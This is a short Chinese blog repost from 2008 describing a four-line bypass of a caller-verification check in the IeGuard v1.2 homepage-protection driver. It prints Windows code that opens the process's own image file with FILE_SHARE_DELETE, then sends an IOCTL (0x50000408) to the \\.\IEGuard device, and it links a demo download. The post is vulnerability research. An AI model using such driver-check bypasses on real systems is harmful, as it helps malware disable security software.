四行代码绕过首页巡警v1.2

2008/05/28 20:03 | 鬼仔 | 技术文章 | 占个座先

作者:MJ0011
来源:MJ0011的内核驱动研究所

首页巡警v1.2版加入了一个校验,在发送IRP_MJ_CREATE请求到其驱动时,会打开当前进程的 SectionObject->SegmentObject->BaseAddress->FileObject,并打开进程文件进行 校验,若不是IeGuard的话,就拒绝操作其驱动

不过,同样非常轻易可以绕过

代码如下:
GetModuleFileName(0 , filename , MAX_PATH);
CreateFile( filename ,
FILE_READ_DATA ,
FILE_SHARE_DELETE,
0,
OPEN_EXISTING ,
0,
0);

HANDLE hdev = CreateFile(“\\\\.\\IEGuard” ,
FILE_READ_ATTRIBUTES ,
0 ,
0,
OPEN_EXISTING ,
0 ,
0
);

DeviceIoControl(hdev ,
0x50000408 ,
0 , 0 , 0 , 0 , &retlen , 0 );

测试程序下载:

http://mj0011.ys168.com/

漏洞演示下BypassIeGuard12.rar

Tags:

相关日志

发表评论